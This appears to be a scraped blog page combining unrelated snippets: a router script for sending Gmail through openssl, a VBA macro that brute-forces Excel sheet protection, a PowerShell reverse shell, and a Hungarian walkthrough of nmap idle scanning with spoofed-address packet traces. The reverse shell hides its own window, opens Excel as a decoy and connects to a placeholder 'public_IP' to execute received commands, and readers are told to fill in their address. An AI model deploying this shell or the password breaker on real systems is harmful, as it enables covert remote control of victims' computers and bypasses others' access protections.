Sending e-mail with GMail on Entware-ng Asus routers

It’s possible to send emails even from Gmail account through openssl, first we need to download a trusted certificate:

wget -c -O /jffs/configs/Equifax_Secure_Certificate_Authority.pem http://www.geotrust.com/resources/root_certificates/certificates/Equifax_Secure_Certificate_Authority.pem --no-check-certificate

And a example:

#!/bin/sh
FROM="your-gmail-address"
AUTH="your-gmail-username"
PASS="your-gmail-password"
FROMNAME="Your Router"
TO="your-email-address"

echo "Your friendly router." >>/tmp/mail.txt
echo "" >>/tmp/mail.txt

cat /tmp/mail.txt | sendmail -H"exec openssl s_client -quiet \
-CAfile /jffs/configs/Equifax_Secure_Certificate_Authority.pem \
-connect smtp.gmail.com:587 -tls1 -starttls smtp" \
-f"$FROM" \
-au"$AUTH" -ap"$PASS" $TO 

rm /tmp/mail.txt

Decrypt Excel Password

Put this code into VB, and run…

Sub PasswordBreaker()
 Dim i As Integer, j As Integer, k As Integer
 Dim l As Integer, m As Integer, n As Integer
 Dim i1 As Integer, i2 As Integer, i3 As Integer
 Dim i4 As Integer, i5 As Integer, i6 As Integer
 On Error Resume Next
 For i = 65 To 66: For j = 65 To 66: For k = 65 To 66
 For l = 65 To 66: For m = 65 To 66: For i1 = 65 To 66
 For i2 = 65 To 66: For i3 = 65 To 66: For i4 = 65 To 66
 For i5 = 65 To 66: For i6 = 65 To 66: For n = 32 To 126
 ActiveSheet.Unprotect Chr(i) & Chr(j) & Chr(k) & _
 Chr(l) & Chr(m) & Chr(i1) & Chr(i2) & Chr(i3) & _
 Chr(i4) & Chr(i5) & Chr(i6) & Chr(n)
 If ActiveSheet.ProtectContents = False Then
 MsgBox "One usable password is " & Chr(i) & Chr(j) & _
 Chr(k) & Chr(l) & Chr(m) & Chr(i1) & Chr(i2) & _
 Chr(i3) & Chr(i4) & Chr(i5) & Chr(i6) & Chr(n)
 Exit Sub
 End If
 Next: Next: Next: Next: Next: Next
 Next: Next: Next: Next: Next: Next
End Sub

Powershell reverse shell example code

Add-Type -Name win -MemberDefinition ‘[DllImport(“user32.dll”)] public static extern bool ShowWindow(int handle, int state);’ -Namespace native
[native.win]::ShowWindow(([System.Diagnostics.Process]::GetCurrentProcess() | Get-Process).MainWindowHandle,0)
Invoke-Item “C:\Program Files\Microsoft Office\Office15\excel.exe”
Set-Location c:\windows\system32
$client = New-Object System.Net.Sockets.TCPClient(“public_IP”,public_port);
$stream = $client.GetStream();[byte[]]$bytes = 0..255|%{0};
while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + “PS ” + (pwd).Path + “> “;$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};
$client.Close()

Of’course change the public_IP and public_port variable, and Invoke-Item application path!

Idlescan, és ami mögötte van #1

Első körben az nmap küld egy halom SYN/ACK keretet az eszköznek (amiből majd a zombie gép lesz), és figyeli az RST válaszokat (itt az IPID értéke az érdekes, ennek következetesen növekvőnek kell lennie). Ekkor még nincs semmiféle kommunikáció a célgéppel!
iz_1A trace kimenet, figyeljük meg az IPID értékének növekedését (jobb olvashatóság miatt formáztam a kimenetet egy kicsit):

Source           Destination      Summary 
-----------------------------------------------------------------------------------------
[192.168.0.10]   [192.168.0.100]  IP:  D=[192.168.0.100] S=[192.168.0.10]  LEN=20 ID=1592
[192.168.0.100]  [192.168.0.10]   IP:  D=[192.168.0.10]  S=[192.168.0.100] LEN=20 ID=0994 <--
[192.168.0.10]   [192.168.0.100]  IP:  D=[192.168.0.100] S=[192.168.0.10]  LEN=20 ID=2012
[192.168.0.100]  [192.168.0.10]   IP:  D=[192.168.0.10]  S=[192.168.0.100] LEN=20 ID=0995 <--
[192.168.0.10]   [192.168.0.100]  IP:  D=[192.168.0.100] S=[192.168.0.10]  LEN=20 ID=9228
[192.168.0.100]  [192.168.0.10]   IP:  D=[192.168.0.10]  S=[192.168.0.100] LEN=20 ID=0996 <--
[192.168.0.10]   [192.168.0.100]  IP:  D=[192.168.0.100] S=[192.168.0.10]  LEN=20 ID=5056
[192.168.0.100]  [192.168.0.10]   IP:  D=[192.168.0.10]  S=[192.168.0.100] LEN=20 ID=0997 <--
[192.168.0.10]   [192.168.0.100]  IP:  D=[192.168.0.100] S=[192.168.0.10]  LEN=20 ID=6306
[192.168.0.100]  [192.168.0.10]   IP:  D=[192.168.0.10]  S=[192.168.0.100] LEN=20 ID=0998 <--
[192.168.0.10]   [192.168.0.100]  IP:  D=[192.168.0.100] S=[192.168.0.10]  LEN=20 ID=1468
[192.168.0.100]  [192.168.0.10]   IP:  D=[192.168.0.10]  S=[192.168.0.100] LEN=20 ID=0999 <--

Miután a forrásgép és a leendő zombie gép közt a kommunikáció sikeres volt, az NMAP meghamisítja az IP címet a célállomás részére, és kommunikációt még 4 alkalommal megismétli. A trace filet megvizsgálva észrevehetjük, hogy a forrás cím hamisításra került (a célgép IP címét vette fel), és erre az IP címre válaszol a zombie gép! A forrásgép SOHA nem látja a visszakapott válaszokat!
iz_2

Source           Destination      Summary 
-----------------------------------------------------------------------------------------
[192.168.0.200]  [192.168.0.100]  IP:  D=[192.168.0.100] S=[192.168.0.200] LEN=20 ID=3940
[192.168.0.100]  [192.168.0.200]  IP:  D=[192.168.0.200] S=[192.168.0.100] LEN=20 ID=1000 <--
[192.168.0.200]  [192.168.0.100]  IP:  D=[192.168.0.100] S=[192.168.0.200] LEN=20 ID=8034
[192.168.0.100]  [192.168.0.200]  IP:  D=[192.168.0.200] S=[192.168.0.100] LEN=20 ID=1001 <--
[192.168.0.200]  [192.168.0.100]  IP:  D=[192.168.0.100] S=[192.168.0.200] LEN=20 ID=3069
[192.168.0.100]  [192.168.0.200]  IP:  D=[192.168.0.200] S=[192.168.0.100] LEN=20 ID=1002 <--
[192.168.0.200]  [192.168.0.100]  IP:  D=[192.168.0.100] S=[192.168.0.200] LEN=20 ID=3373
[192.168.0.100]  [192.168.0.200]  IP:  D=[192.168.0.200] S=[192.168.0.100] LEN=20 ID=1003 <--

Mivel a forrásgéphez nem érkeznek meg a csomagok, az nmap nem tudja megállapítani, hogy a hamisítás megfelelően működött. Ezért az nmap lekérdezi a zombie gépet, hogy frissítse az IPID értéket:
iz_3

Source           Destination      Summary 
---------------------------------------------------------------------------------------
[192.168.0.10]   [192.168.0.100]  IP:  D=[192.168.0.100] S=[192.168.0.10] LEN=20 ID=6267
[192.168.0.100]  [192.168.0.10]   IP:  D=[192.168.0.10] S=[192.168.0.100] LEN=20 ID=1004 <--

Az IPID értéke 1004, amire vártunk 😀 Most, hogy az IPID elemzés befejeződött, az nmap elkezdheti a célgép szkennelését.